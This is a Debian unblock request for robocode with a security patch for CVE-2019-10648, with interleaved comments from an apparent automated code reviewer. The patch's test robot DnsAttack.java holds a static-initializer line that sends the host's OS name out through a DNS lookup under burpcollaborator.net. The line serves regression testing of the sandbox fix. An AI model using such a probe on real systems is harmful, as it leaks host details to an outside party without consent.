Package: release.debian.org
Severity: normal
User: release.debian....@packages.debian.org
Usertags: unblock

Please unblock package robocode

Robocode in Buster is affected by CVE-2019-10648. The fix applied
cleanly and all tests pass. This is Debian bug 926088.

Thank you.

unblock robocode/1.9.3.3-2

-- System Information:
Debian Release: buster/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), 
LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect
diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog
--- robocode-1.9.3.3/debian/changelog   2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/changelog   2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+  * Fix CVE-2019-10648:
+    Robocode allows remote attackers to cause external service interaction
+    (DNS), as demonstrated by a query for a unique subdomain name within an
+    attacker-controlled DNS zone, because of a .openStream call within
+    java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <a...@debian.org>  Mon, 08 Apr 2019 00:13:19 +0200
+
 robocode (1.9.3.3-1) unstable; urgency=medium
 
   * New upstream version 1.9.3.3.
diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 
robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch
--- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch        1970-01-01 
01:00:00.000000000 +0100
+++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch        2019-04-08 
00:13:19.000000000 +0200
@@ -0,0 +1,235 @@
+From: Markus Koschany <a...@debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: 
https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java     | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java     | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java     | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java    | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java     | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 
robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git 
a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
 
b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- 
a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ 
b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+ 
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+ 
+ 
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+               }
+ 
+               Thread c = Thread.currentThread();
+-
+               if (isSafeThread(c)) {
+                       return;
+               }
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+                       if (robotProxy != null) {
+                               robotProxy.punishSecurityViolation(message);
+                       }
+-                      throw new AccessControlException(message);
++                      throw new SecurityException(message);
+               }
+       }
+ 
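Review bot: Replacing `AccessControlException` with its supertype `SecurityException` narrows what callers can rely on: any code that catches `AccessControlException` specifically will no longer catch this violation, and the old tests' `access denied (java.net.SocketPermission` text match disappears with it. If no such catch sites exist (I cannot see the callers from here) this is fine, but `import java.security.AccessControlException;` kept at the top of the file suggests the type is still referenced somewhere, which is worth confirming; if not, drop the import. The enclosing method starts outside this hunk.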
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+                       return;
+               }
+               Thread c = Thread.currentThread();
+-
+               if (isSafeThread(c)) {
+                       return;
+               }
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends 
SecurityManager {
+                       String message = "Robots are only allowed to create up 
to 5 threads!";
+ 
+                       robotProxy.punishSecurityViolation(message);
+-                      throw new AccessControlException(message);
++                      throw new SecurityException(message);
+               }
+       }
++      
++    public void checkPermission(Permission perm) {
++              if (RobocodeProperties.isSecurityOff()) {
++                      return;
++              }
++              Thread c = Thread.currentThread();
++              if (isSafeThread(c)) {
++                      return;
++              }
++        super.checkPermission(perm);
++
++        if (perm instanceof SocketPermission) {
++              IHostedThread robotProxy = 
threadManager.getLoadedOrLoadingRobotProxy(c);
++              String message = "Using socket is not allowed";
++              robotProxy.punishSecurityViolation(message);
++            throw new SecurityException(message);
++        }
++    }
+ 
+       private boolean isSafeThread(Thread c) {
+               return threadManager.isSafeThread(c);
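Review bot: The new `checkPermission` override calls `super.checkPermission(perm)` before testing `perm instanceof SocketPermission`, so a `SocketPermission` naming a hostname is first handed to the policy, and in the JDK `SocketPermission.implies` can resolve that hostname to compare addresses — which is the external DNS interaction this CVE is about, so the order should be reversed and socket use rejected before any policy lookup. Second, `robotProxy` returned by `getLoadedOrLoadingRobotProxy(c)` is dereferenced without the `if (robotProxy != null)` guard the earlier method in this class uses, so a non-robot thread touching a socket would die with a NullPointerException instead of the intended SecurityException. Third, the two early returns skip `super.checkPermission` entirely, whereas before this patch the class did not override `checkPermission` and the inherited one applied the policy to every thread; safe threads now get every permission type, not just sockets, and if that widening is intended it deserves a comment. The hunk ends inside `isSafeThread`, whose closing brace is outside it.
```java
    public void checkPermission(Permission perm) {
        // … unchanged: isSecurityOff() and isSafeThread(c) early returns …
        if (perm instanceof SocketPermission) {
            // Reject before consulting the policy: SocketPermission.implies()
            // may resolve the target hostname, which would itself leak a DNS query.
            IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
            String message = "Using socket is not allowed";
            if (robotProxy != null) {
                robotProxy.punishSecurityViolation(message);
            }
            throw new SecurityException(message);
        }
        super.checkPermission(perm);
    }
```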
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java 
b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++      static {
++              try {
++                      new java.net.URL("http://"; + 
System.getProperty("os.name").replaceAll(" ", ".")
++                                      + 
".randomsubdomain.burpcollaborator.net").openStream();
++              } catch (Exception e) {
++              }
++      }
++
++      public void run() {
++              for (;;) {
++                      ahead(100);
++                      back(100);
++              }
++      }
++}
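Review bot: The probe in the static initializer targets a real third-party host, `randomsubdomain.burpcollaborator.net`, so any regression in `RobocodeSecurityManager` makes the test suite itself perform the external DNS interaction this CVE describes, against a service the project does not control. Use a name reserved for exactly this purpose instead, e.g. `+ ".randomsubdomain.robocode.invalid")` (RFC 2606 reserves `.invalid` for names intended never to resolve), which keeps a regression from reaching anyone's collaborator zone. The `"http://";` on the first URL line looks like a rendering artifact of `"http://" +` in the list archive rather than source text, worth confirming against the origin commit. The empty `catch (Exception e)` is intentional here but should say so: `// ignored: the security manager is expected to throw; the robot must still load`.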
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 
+       private boolean messagedInitialization;
+-      private boolean messagedAccessDenied;
++      private boolean securityExceptionOccurred;
+       
+       @Override
+       public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends 
RobocodeTestBed {
+                       messagedInitialization = true;  
+               }       
+ 
+-              if (out.contains("access denied (java.net.SocketPermission")
+-                              || out.contains("access denied 
(\"java.net.SocketPermission\"")) {
+-                      messagedAccessDenied = true;    
++              if (out.contains("java.lang.SecurityException:")) {
++                      securityExceptionOccurred = true;       
+               }       
+       }
+ 
+       @Override
+       protected void runTeardown() {
+               Assert.assertTrue("Error during initialization", 
messagedInitialization);
+-              Assert.assertTrue("HTTP connection is not allowed", 
messagedAccessDenied);
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
+       }
+ 
+       @Override
+       protected int getExpectedErrors() {
+-              return hasJavaNetURLPermission ? 3 : 2; // Security error must 
be reported as an error
++              return 2;
+       }
+ }
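Review bot: The new check `out.contains("java.lang.SecurityException:")` accepts any `SecurityException`, including the thread-limit violation the security manager now throws with the same type, so the test no longer proves that the HTTP connection itself was refused the way the previous `java.net.SocketPermission` match did. Matching the socket-specific message, `if (out.contains("Using socket is not allowed")) {`, keeps the assertion tied to the behaviour under test and mirrors what TestStaticConstructorDnsAttack already does. The hard-coded `return 2;` also loses the explanation that came with the old expression; keep `// Security error must be reported as an error` above it so the count stays understandable.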
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+  */
+ public class TestHttpAttack extends RobocodeTestBed {
+ 
+-      private boolean messagedAccessDenied;
++      private boolean securityExceptionOccurred;
+       
+       @Override
+       public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+ 
+               final String out = 
event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+ 
+-              if (out.contains("access denied (java.net.SocketPermission")
+-                              || out.contains("access denied 
(\"java.net.SocketPermission\"")) {
+-                      messagedAccessDenied = true;    
++              if (out.contains("java.lang.SecurityException:")) {
++                      securityExceptionOccurred = true;       
+               }       
+       }
+ 
+       @Override
+       protected void runTeardown() {
+-              Assert.assertTrue("HTTP connection is not allowed", 
messagedAccessDenied);
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
+       }
+ 
+       @Override
+       protected int getExpectedErrors() {
+-              return hasJavaNetURLPermission ? 2 : 1; // Security error must 
be reported as an error. Java 8 reports two errors.
++              return 1;
+       }
+ }
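Review bot: Detecting the violation via `out.contains("java.lang.SecurityException:")` is looser than the `java.net.SocketPermission` match it replaces: every violation the security manager raises is now a `SecurityException`, so an unrelated denial (for example the five-thread limit) would make this HTTP test pass. Assert on the message the new socket check emits, `if (out.contains("Using socket is not allowed")) {`, so the test fails if socket use is ever permitted again but some other violation happens to be logged. The `return 1;` in `getExpectedErrors` drops the note about why a security error counts as an error; a one-line `// Security error must be reported as an error` keeps that reasoning with the number.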
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++      private boolean securityExceptionOccurred;
++      
++      @Override
++      public String getRobotNames() {
++              return "tested.robots.DnsAttack,sample.Target";
++      }
++
++      @Override
++      public void onTurnEnded(TurnEndedEvent event) {
++              super.onTurnEnded(event);
++
++              final String out = 
event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++              if (out.contains("SYSTEM: Using socket is not allowed")) {
++                      securityExceptionOccurred = true;       
++              }       
++      }
++
++      @Override
++      protected void runTeardown() {
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
++      }
++
++      @Override
++      protected int getExpectedErrors() {
++              return 1;
++      }
++}
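Review bot: The assertion only checks that `SYSTEM: Using socket is not allowed` was printed, which shows the robot was punished but not that the hostname was never resolved; with `checkPermission` consulting `super.checkPermission(perm)` before its `SocketPermission` test, a DNS query could in principle still leave the process before the message appears. A short comment on `runTeardown` stating this limitation, e.g. `// Verifies the violation is reported, not that no DNS traffic occurred.`, would keep the next maintainer from reading the test as a full regression guard for CVE-2019-10648. `getRobots()[0]` relies on `tested.robots.DnsAttack` being listed first in `getRobotNames`, which holds here but deserves a one-line comment.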
diff -Nru robocode-1.9.3.3/debian/patches/series 
robocode-1.9.3.3/debian/patches/series
--- robocode-1.9.3.3/debian/patches/series      2018-09-13 13:52:33.000000000 
+0200
+++ robocode-1.9.3.3/debian/patches/series      2019-04-08 00:13:19.000000000 
+0200
@@ -1,3 +1,4 @@
 showJavaDocumentation.patch
 maven-assembly.patch
 ecj.patch
+CVE-2019-10648.patch
